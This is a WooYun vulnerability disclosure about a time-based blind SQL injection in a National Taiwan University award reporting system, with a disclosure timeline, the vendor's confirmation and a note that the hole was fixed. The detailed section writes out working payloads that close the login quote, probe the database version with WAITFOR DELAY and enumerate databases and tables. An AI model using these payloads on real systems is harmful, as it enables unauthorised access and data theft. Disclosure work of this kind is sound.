当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0155770

漏洞标题:國立臺灣大學某系統sql注入漏洞(279库)(臺灣地區)

相关厂商:國立臺灣大學

漏洞作者: 云野

提交时间:2015-11-25 13:29

修复时间:2016-01-11 22:34

公开时间:2016-01-11 22:34

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-25: 细节已通知厂商并且等待厂商处理中
2015-11-27: 厂商已经确认,细节仅向厂商公开
2015-12-07: 细节向核心白帽子及相关领域专家公开
2015-12-17: 细节向普通白帽子公开
2015-12-27: 细节向实习白帽子公开
2016-01-11: 细节向公众公开

简要描述:

dbid测得是279个库……mssql2008的post注入,延时

详细说明:

國立臺灣大學研究生獎勵金資訊申報系統,网址:
https://**.**.**.**/award/
看到登录框,先试一下用户名admin'密码随意登录,发现跳到错误页面
然后用户名admin' or 1=1 or 'a'='a显示账号或密码错误

t1.PNG


闭合了引号,有戏
试一下延时,

t2.PNG


判断数据库版本:

admin';if @@version like '%2008%' WAITFOR DELAY '0:0:3'--


有延时,数据库版本为mssql 2008

t3.PNG


跑当前数据库:admin';if len(db_name())>5 WAITFOR DELAY '0:0:3'--为假
当前数据库长度为5,逐位跑

admin';if (ascii(substring(db_name(),1,1)))>97 WAITFOR DELAY '0:0:3'--


数据库为award
当前用户:长度为8……太长了,不猜了……
看看数据库数量

admin';if(select count(*) from master.dbo.sysdatabases where dbid=279)=1 WAITFOR DELAY '0:0:3'--


有279个库……
用这个可以逐位猜库名

admin';if (select count(*) from master.dbo.sysdatabases where dbid=11 and ascii(substring(name,1,1))>0)=1 WAITFOR DELAY '0:0:3'--


dbid=69的库名字是admin

admin';if (select count(*) from master.dbo.sysdatabases where dbid=69 and substring(name,1,5) like 'admin')=1 WAITFOR DELAY '0:0:3'--


用这个猜表名:

admin';if (select count(*) from accr.dbo.sysobjects where name in (select top 1 name from accr.dbo.sysobjects where xtype='u') and ascii(substring(name,1,1))>0)=1 WAITFOR DELAY '0:0:3'--


可以跑出来数据就够了吧……下来要写工具跑了

漏洞证明:

见说明

修复方案:

过滤

版权声明:转载请注明来源 云野@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:16

确认时间:2015-11-27 22:33

厂商回复:

感謝通報

最新状态:

2016-01-12:已修復